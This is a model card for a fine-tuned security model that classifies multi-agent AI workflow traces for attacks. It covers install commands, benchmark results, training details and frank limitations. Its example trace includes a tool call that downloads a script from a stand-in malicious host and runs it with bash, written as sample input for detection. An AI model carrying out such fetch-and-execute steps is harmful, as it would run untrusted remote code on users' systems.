Instructions to use guerilla7/agentic-safety-gguf with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- llama-cpp-python
How to use guerilla7/agentic-safety-gguf with llama-cpp-python:
# !pip install llama-cpp-python from llama_cpp import Llama llm = Llama.from_pretrained( repo_id="guerilla7/agentic-safety-gguf", filename="agentic-safety-v4-q4_k_m.gguf", )
llm.create_chat_completion( messages = "No input example has been defined for this model task." )
- Notebooks
- Google Colab
- Kaggle
- Local Apps
- llama.cpp
How to use guerilla7/agentic-safety-gguf with llama.cpp:
Install from brew
brew install llama.cpp # Start a local OpenAI-compatible server with a web UI: llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M # Run inference directly in the terminal: llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
Install from WinGet (Windows)
winget install llama.cpp # Start a local OpenAI-compatible server with a web UI: llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M # Run inference directly in the terminal: llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
Use pre-built binary
# Download pre-built binary from: # https://github.com/ggerganov/llama.cpp/releases # Start a local OpenAI-compatible server with a web UI: ./llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M # Run inference directly in the terminal: ./llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
Build from source code
git clone https://github.com/ggerganov/llama.cpp.git cd llama.cpp cmake -B build cmake --build build -j --target llama-server llama-cli # Start a local OpenAI-compatible server with a web UI: ./build/bin/llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M # Run inference directly in the terminal: ./build/bin/llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
Use Docker
docker model run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
- LM Studio
- Jan
- Ollama
How to use guerilla7/agentic-safety-gguf with Ollama:
ollama run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
- Unsloth Studio new
How to use guerilla7/agentic-safety-gguf with Unsloth Studio:
Install Unsloth Studio (macOS, Linux, WSL)
curl -fsSL https://unsloth.ai/install.sh | sh # Run unsloth studio unsloth studio -H 0.0.0.0 -p 8888 # Then open http://localhost:8888 in your browser # Search for guerilla7/agentic-safety-gguf to start chatting
Install Unsloth Studio (Windows)
irm https://unsloth.ai/install.ps1 | iex # Run unsloth studio unsloth studio -H 0.0.0.0 -p 8888 # Then open http://localhost:8888 in your browser # Search for guerilla7/agentic-safety-gguf to start chatting
Using HuggingFace Spaces for Unsloth
# No setup required # Open https://huggingface.co/spaces/unsloth/studio in your browser # Search for guerilla7/agentic-safety-gguf to start chatting
- Docker Model Runner
How to use guerilla7/agentic-safety-gguf with Docker Model Runner:
docker model run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
- Lemonade
How to use guerilla7/agentic-safety-gguf with Lemonade:
Pull the model
# Download Lemonade from https://lemonade-server.ai/ lemonade pull guerilla7/agentic-safety-gguf:Q4_K_M
Run and chat with the model
lemonade run user.agentic-safety-gguf-Q4_K_M
List all available models
lemonade list
llm.create_chat_completion(
messages = "No input example has been defined for this model task."
)agentic-safety-gguf
Research Paper:(https://arxiv.org/abs/2601.00848)
Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.
Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples + 141 targeted augmentation examples, achieving 74.29% accuracy on custom cybersecurity benchmarks—a +31.43-point improvement over base model (p < 0.001).
🎯 Key Capabilities
✅ Temporal Attack Pattern Detection: Identifies malicious sequences across multi-step agent workflows
✅ OpenTelemetry Trace Analysis: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
✅ Security Knowledge Q&A: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK
✅ Multi-Agent Security: Detects coordination attacks in distributed agent systems
⚠️ Critical Production Warning
NOT production-ready for automated security decisions:
- False Positive Rate: 66.7% on benign workflow traces
- Trace Accuracy: 30% overall (60% TPR, 0% TNR)
- Root Cause: Training data heavily skewed toward attacks (90% malicious)
- Deployment: Human-in-the-loop oversight mandatory - suitable for monitoring/alerting only, not automated blocking
See research paper for detailed analysis and proposed V5 improvements.
📊 Performance Summary
| Benchmark | Base Model | agentic-safety-gguf | Improvement |
|---|---|---|---|
| Custom MCQA Overall | 42.86% | 74.29% | +31.43 pts |
| Agentic AI Security | 40.0% | 70.0% | +30.0 pts |
| Traditional Security | 44.0% | 76.0% | +32.0 pts |
| MMLU Computer Security | - | 74.0% | - |
| MMLU Security Studies | - | 72.24% | - |
Statistical Validation: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)
Iterative Training: V2 baseline (80,851 ex) → V3 (+111 OWASP) → V4 (+30 adversarial) demonstrated targeted augmentation effectiveness.
🚀 Quick Start
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
model_name,
torch_dtype=torch.bfloat16,
device_map="auto"
)
# Security Q&A
messages = [
{"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
{"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]
inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)
Analyzing Workflow Traces
import json
trace = {
"spans": [
{"name": "user_request", "attributes": {"action": "fetch_emails"}},
{"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
{"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
]
}
prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}
Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""
# Use model as above with prompt
⚠️ Warning: 66.7% FPR requires human review before taking action.
📖 Use Cases
✅ Recommended
- Security research on agentic AI vulnerabilities
- Educational demonstrations (OWASP Top 10)
- Prototype development for security tools
- Knowledge assistance (74% MCQA accuracy)
❌ Not Recommended
- Production security monitoring without human oversight
- Automated security decisions (30% trace accuracy insufficient)
- Mission-critical applications
- Regulatory compliance automation
🎓 Training Details
Dataset: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training
Complete dataset: guerilla7/agentic-safety-gguf
Method: QLoRA (4-bit NF4, rank 16, alpha 16)
Hardware: NVIDIA DGX Spark (ARM64, 128GB)
Training: V2 (1,500 steps, 6h 43m) → V3 (+500 steps) → V4 (+500 steps)
Loss: 3.68 → 0.52 (85.99% reduction)
See research paper for the complete methodology, ablation studies, and statistical analysis.
📚 Resources
- Dataset Repository: datasets/guerilla7/agentic-safety-gguf
- Research Paper: (https://arxiv.org/abs/2601.00848)
- Training Scripts: Complete QLoRA implementation, evaluation code, GGUF quantization utilities
📄 Citation
@article{agentic-safety-gguf-2025,
title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
year={2025},
url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}
⚖️ Limitations
- High False Positive Rate (66.7%): Unsuitable for production without human oversight
- Small Evaluation Sample: 30 trace evaluation (±18% confidence intervals)
- Synthetic Data Bias: 43% synthetic training data
- ARM64-Specific: Training validated on DGX Spark only
- No Commercial Comparison: Not benchmarked against GPT-4/Claude
Proposed V5 Solution: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap.
📅 Updates
- 2025-12-29: Initial release with V2/V3/V4 training artifacts and research paper
License
Apache 2.0
- Downloads last month
- 87
4-bit
Model tree for guerilla7/agentic-safety-gguf
Base model
meta-llama/Llama-3.1-8BPaper for guerilla7/agentic-safety-gguf
Evaluation results
- Overall Accuracyself-reported74.290
- Agentic AI Securityself-reported70.000
# !pip install llama-cpp-python from llama_cpp import Llama llm = Llama.from_pretrained( repo_id="guerilla7/agentic-safety-gguf", filename="agentic-safety-v4-q4_k_m.gguf", )